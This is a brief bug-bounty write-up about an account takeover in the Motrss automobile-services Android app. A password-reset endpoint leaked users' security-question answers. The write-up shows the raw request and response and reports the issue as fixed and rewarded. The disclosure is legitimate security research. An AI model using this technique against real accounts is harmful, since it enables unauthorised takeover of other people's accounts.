Motrss Account Takeover

Dipak Kumar Das
Hi guys , Here is one of my simple  write-up on Motrss account takeover . So basically Motrss is your one stop solution for all automobile services. In just few clicks, book your next vehicle servicing, repairing and maintenance service appointment. 

So its a android app , there is a endpoint where some sensitive information was disclosed . Using those information attacker can takeover any user account .

The issue was in reset password functionality

so here the request of password reset  

POST /GetUserSecurityQuestion
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Apache-HttpClient/UNVAILABLE (java 1.4)

and here is the response 

HTTP/1.1 200 OK
Date: Tue, 17 Jan 2017 09:58:41 GTM
Server: Apache
Content-Length : 116
Connect: close
Content-Type: text/html; charset-UTF-8

{"status":"Success","Data":[{"id":"7","questions":"What is your dream Job?","signup_status":"N","answer":"Google"}]}

so here in the response the security question answer reflected 

now just use that answer and create new password and login  

So here is the video Proof of concept  

Status: Fixed
Bounty Rewarded

